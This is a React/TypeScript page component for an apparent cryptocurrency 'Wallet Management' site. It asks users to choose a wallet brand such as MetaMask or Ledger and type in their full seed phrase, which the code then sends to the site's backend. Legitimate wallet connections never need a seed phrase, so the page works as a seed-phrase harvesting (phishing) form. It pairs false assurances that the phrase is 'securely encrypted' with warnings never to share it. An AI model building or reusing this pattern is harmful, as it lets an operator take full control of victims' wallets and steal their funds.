// src/pages/Wallet.tsx
import React, { useState, useEffect } from "react";
import { useDispatch, useSelector } from "react-redux";
import { RootState } from "../redux/store";
import {
  connectWallet,
  disconnectWallet,
  getWallet,
} from "../redux/slices/walletSlice";
import { GlobalStyles } from "../styles/globalStyles";
import {
  Wallet as WalletIcon,
  AlertTriangle,
  CheckCircle,
  Key,
  Shield,
  ChevronDown,
} from "lucide-react";
import toast from "react-hot-toast";

// Wallet options data
const WALLET_OPTIONS = [
  {
    id: "metamask",
    name: "MetaMask",
    description: "Browser extension wallet",
    icon: "🦊",
  },
  {
    id: "trustwallet",
    name: "Trust Wallet",
    description: "Mobile wallet with multi-chain support",
    icon: "🔒",
  },
  {
    id: "ledger",
    name: "Ledger",
    description: "Hardware wallet for maximum security",
    icon: "💎",
  },
  {
    id: "trezor",
    name: "Trezor",
    description: "Hardware wallet with advanced security",
    icon: "🛡️",
  },
  {
    id: "exodus",
    name: "Exodus",
    description: "Desktop & mobile wallet with built-in exchange",
    icon: "🚀",
  },
  {
    id: "phantom",
    name: "Phantom",
    description: "Solana & Ethereum wallet",
    icon: "👻",
  },
  {
    id: "coinbase",
    name: "Coinbase Wallet",
    description: "From Coinbase exchange",
    icon: "🏦",
  },
  {
    id: "custom",
    name: "Custom Wallet",
    description: "Other wallet or self-custody solution",
    icon: "⚙️",
  },
];

const Wallet: React.FC = () => {
  const dispatch = useDispatch();
  const { wallet, isLoading } = useSelector((state: RootState) => state.wallet);
  const { user } = useSelector((state: RootState) => state.auth);
  const [seedPhrase, setSeedPhrase] = useState("");
  const [selectedWallet, setSelectedWallet] = useState("");
  const [customWalletName, setCustomWalletName] = useState("");
  const [isDropdownOpen, setIsDropdownOpen] = useState(false);

  useEffect(() => {
    if (user?.wallet_connected && !wallet) {
      dispatch(getWallet() as any);
    }
  }, [user, wallet, dispatch]);

  const handleConnect = async (e: React.FormEvent) => {
    e.preventDefault();

    // Determine wallet name to use
    let walletNameToUse = selectedWallet;
    if (selectedWallet === "custom") {
      if (!customWalletName.trim()) {
        toast.error("Please enter a name for your custom wallet");
        return;
      }
      walletNameToUse = customWalletName;
    }

    if (!selectedWallet || !seedPhrase) {
      toast.error("Please select a wallet type and enter your seed phrase");
      return;
    }

    try {
      await dispatch(
        connectWallet({
          wallet_name: walletNameToUse,
          seed_phrase: seedPhrase,
        }) as any
      );
      toast.success("Wallet connected successfully!");
      setSeedPhrase("");
      setSelectedWallet("");
      setCustomWalletName("");
    } catch (error) {
      toast.error("Failed to connect wallet");
    }
  };

  const handleDisconnect = async () => {
    if (window.confirm("Are you sure you want to disconnect your wallet?")) {
      try {
        await dispatch(disconnectWallet() as any);
        toast.success("Wallet disconnected successfully!");
      } catch (error) {
        toast.error("Failed to disconnect wallet");
      }
    }
  };

  const getSelectedWalletInfo = () => {
    return WALLET_OPTIONS.find((wallet) => wallet.id === selectedWallet);
  };

  if (isLoading) {
    return (
      <div className="flex h-64 items-center justify-center">
        <div className={`${GlobalStyles.spinner} h-8 w-8`}></div>
      </div>
    );
  }

  return (
    <div className={GlobalStyles.pageContainer}>
      <div className={GlobalStyles.contentContainer}>
        {/* Header */}
        <div className={GlobalStyles.sectionSpacing}>
          <h1 className={GlobalStyles.heading1}>Wallet Management</h1>
          <p className={GlobalStyles.bodyText + " mt-2"}>
            Connect and manage your cryptocurrency wallet
          </p>
        </div>

        {wallet ? (
          <div className="space-y-6">
            {/* Wallet Connected Card */}
            <div className={GlobalStyles.card}>
              <div className="flex items-center justify-between mb-6">
                <div className="flex items-center">
                  <div className="p-3 rounded-lg bg-primary/10">
                    <WalletIcon className="h-6 w-6 text-primary" />
                  </div>
                  <div className="ml-4">
                    <h3 className={GlobalStyles.heading3}>
                      {wallet.wallet_name}
                    </h3>
                    <p className="text-sm text-gray-500 dark:text-gray-400">
                      Connected on{" "}
                      {new Date(wallet.created_at).toLocaleDateString()}
                    </p>
                  </div>
                </div>
                <span
                  className={`${GlobalStyles.badge} ${GlobalStyles.badgeSuccess}`}
                >
                  Connected
                </span>
              </div>

              {/* Security Warning */}
              <div
                className={`${GlobalStyles.alert} ${GlobalStyles.alertWarning} mb-6`}
              >
                <AlertTriangle className="h-5 w-5 flex-shrink-0" />
                <div>
                  <p className="text-sm font-medium">Security Notice</p>
                  <p className="text-sm mt-1">
                    Your seed phrase is securely encrypted. Never share it with
                    anyone.
                  </p>
                </div>
              </div>

              {/* Wallet Information */}
              <div className="grid grid-cols-1 md:grid-cols-2 gap-4 mb-6">
                <div className="p-4 bg-gray-50 dark:bg-gray-800/50 rounded-lg">
                  <div className="flex items-center mb-2">
                    <Key className="h-4 w-4 text-gray-400 mr-2" />
                    <p className="text-sm text-gray-500 dark:text-gray-400">
                      Connection Status
                    </p>
                  </div>
                  <div className="flex items-center">
                    <div className="w-2 h-2 bg-green-500 rounded-full mr-2"></div>
                    <p className="font-medium text-gray-900 dark:text-white">
                      Active
                    </p>
                  </div>
                </div>
                <div className="p-4 bg-gray-50 dark:bg-gray-800/50 rounded-lg">
                  <div className="flex items-center mb-2">
                    <Shield className="h-4 w-4 text-gray-400 mr-2" />
                    <p className="text-sm text-gray-500 dark:text-gray-400">
                      Type
                    </p>
                  </div>
                  <p className="font-medium text-gray-900 dark:text-white">
                    Multi-chain Wallet
                  </p>
                </div>
              </div>

              {/* Actions */}
              <div className="flex flex-wrap gap-3">
                <button
                  onClick={handleDisconnect}
                  className={`${GlobalStyles.button} ${GlobalStyles.buttonDanger} ${GlobalStyles.buttonMedium}`}
                >
                  Disconnect Wallet
                </button>
              </div>
            </div>

            {/* Security Tips */}
            <div className={GlobalStyles.card}>
              <h3 className={`${GlobalStyles.heading3} mb-6 flex items-center`}>
                <AlertTriangle className="h-5 w-5 text-yellow-500 mr-2" />
                Wallet Security Tips
              </h3>
              <div className="space-y-4">
                <div className="flex items-start">
                  <CheckCircle className="h-5 w-5 text-green-500 mr-3 mt-0.5 flex-shrink-0" />
                  <div>
                    <p className="font-medium text-gray-900 dark:text-white">
                      Never share your seed phrase
                    </p>
                    <p className="text-sm text-gray-500 dark:text-gray-400 mt-1">
                      Never share your seed phrase with anyone, including
                      support staff
                    </p>
                  </div>
                </div>
                <div className="flex items-start">
                  <CheckCircle className="h-5 w-5 text-green-500 mr-3 mt-0.5 flex-shrink-0" />
                  <div>
                    <p className="font-medium text-gray-900 dark:text-white">
                      Store securely offline
                    </p>
                    <p className="text-sm text-gray-500 dark:text-gray-400 mt-1">
                      Store your seed phrase in a secure offline location
                    </p>
                  </div>
                </div>
                <div className="flex items-start">
                  <CheckCircle className="h-5 w-5 text-green-500 mr-3 mt-0.5 flex-shrink-0" />
                  <div>
                    <p className="font-medium text-gray-900 dark:text-white">
                      Regular updates
                    </p>
                    <p className="text-sm text-gray-500 dark:text-gray-400 mt-1">
                      Regularly update your wallet software for security patches
                    </p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        ) : (
          <div className={GlobalStyles.card}>
            <div className="text-center mb-8">
              <div className="mx-auto w-20 h-20 bg-gray-100 dark:bg-gray-800 rounded-full flex items-center justify-center mb-4">
                <WalletIcon className="h-10 w-10 text-gray-400" />
              </div>
              <h3 className={GlobalStyles.heading2 + " mb-2"}>
                Connect Your Wallet
              </h3>
              <p className="text-gray-600 dark:text-gray-400">
                Select your wallet type and connect it to start using our
                platform's features
              </p>
            </div>

            <form onSubmit={handleConnect} className="space-y-6">
              {/* Wallet Type Select */}
              <div>
                <label className={GlobalStyles.inputLabel}>
                  Select Wallet Type
                </label>

                {/* Custom dropdown */}
                <div className="relative">
                  <button
                    type="button"
                    onClick={() => setIsDropdownOpen(!isDropdownOpen)}
                    className={`${
                      GlobalStyles.input
                    } flex items-center justify-between w-full text-left ${
                      !selectedWallet ? "text-gray-400" : ""
                    }`}
                  >
                    <div className="flex items-center">
                      {selectedWallet ? (
                        <>
                          <span className="mr-2 text-lg">
                            {
                              WALLET_OPTIONS.find(
                                (w) => w.id === selectedWallet
                              )?.icon
                            }
                          </span>
                          <span>
                            {
                              WALLET_OPTIONS.find(
                                (w) => w.id === selectedWallet
                              )?.name
                            }
                          </span>
                        </>
                      ) : (
                        "Select a wallet type..."
                      )}
                    </div>
                    <ChevronDown
                      className={`h-4 w-4 transition-transform ${
                        isDropdownOpen ? "rotate-180" : ""
                      }`}
                    />
                  </button>

                  {isDropdownOpen && (
                    <div className="absolute z-10 mt-1 w-full bg-white dark:bg-gray-800 border border-gray-200 dark:border-gray-700 rounded-lg shadow-lg max-h-60 overflow-y-auto">
                      {WALLET_OPTIONS.map((walletOption) => (
                        <button
                          key={walletOption.id}
                          type="button"
                          onClick={() => {
                            setSelectedWallet(walletOption.id);
                            setIsDropdownOpen(false);
                          }}
                          className={`w-full text-left px-4 py-3 hover:bg-gray-50 dark:hover:bg-gray-700 transition-colors ${
                            selectedWallet === walletOption.id
                              ? "bg-primary/10 dark:bg-primary/20"
                              : ""
                          }`}
                        >
                          <div className="flex items-center">
                            <span className="text-lg mr-3">
                              {walletOption.icon}
                            </span>
                            <div className="flex-1">
                              <div className="font-medium text-gray-900 dark:text-white">
                                {walletOption.name}
                              </div>
                              <div className="text-xs text-gray-500 dark:text-gray-400 mt-0.5">
                                {walletOption.description}
                              </div>
                            </div>
                          </div>
                        </button>
                      ))}
                    </div>
                  )}
                </div>

                {/* Selected wallet info */}
                {selectedWallet && (
                  <div className="mt-2 p-3 bg-gray-50 dark:bg-gray-800/50 rounded-lg">
                    <p className="text-sm text-gray-600 dark:text-gray-400">
                      Selected:{" "}
                      <span className="font-medium text-gray-900 dark:text-white">
                        {getSelectedWalletInfo()?.name}
                      </span>
                    </p>
                  </div>
                )}
              </div>

              {/* Custom wallet name input (only shown when custom is selected) */}
              {selectedWallet === "custom" && (
                <div className="animate-fade-in">
                  <label
                    htmlFor="customWalletName"
                    className={GlobalStyles.inputLabel}
                  >
                    Custom Wallet Name
                  </label>
                  <input
                    id="customWalletName"
                    type="text"
                    value={customWalletName}
                    onChange={(e) => setCustomWalletName(e.target.value)}
                    className={GlobalStyles.input}
                    placeholder="Enter your wallet name (e.g., My Hardware Wallet)"
                    required={selectedWallet === "custom"}
                  />
                </div>
              )}

              {/* Seed Phrase */}
              <div>
                <label htmlFor="seedPhrase" className={GlobalStyles.inputLabel}>
                  Seed Phrase
                </label>
                <textarea
                  id="seedPhrase"
                  value={seedPhrase}
                  onChange={(e) => setSeedPhrase(e.target.value)}
                  className={`${GlobalStyles.input} min-h-[120px] resize-none`}
                  placeholder="Enter your 12 or 24 word seed phrase..."
                  required
                />
                <p className="text-sm text-gray-500 dark:text-gray-400 mt-2">
                  Your seed phrase is encrypted and stored securely.
                </p>
              </div>

              {/* Terms Agreement */}
              <div className="flex items-start">
                <input
                  id="walletTerms"
                  name="walletTerms"
                  type="checkbox"
                  required
                  className="h-4 w-4 text-primary focus:ring-primary border-gray-300 rounded mt-1"
                />
                <label
                  htmlFor="walletTerms"
                  className="ml-2 text-sm text-gray-600 dark:text-gray-400"
                >
                  I understand that I am responsible for the security of my
                  wallet and seed phrase.
                </label>
              </div>

              {/* Connect Button */}
              <div>
                <button
                  type="submit"
                  disabled={isLoading}
                  className={`${GlobalStyles.button} ${GlobalStyles.buttonPrimary} ${GlobalStyles.buttonLarge} w-full`}
                >
                  {isLoading ? (
                    <div className="flex items-center justify-center">
                      <div
                        className={`${GlobalStyles.spinner} w-5 h-5 mr-2`}
                      ></div>
                      Connecting...
                    </div>
                  ) : (
                    <>
                      <WalletIcon className="h-5 w-5 mr-2" />
                      Connect Wallet
                    </>
                  )}
                </button>
              </div>
            </form>
          </div>
        )}
      </div>
    </div>
  );
};

export default Wallet;
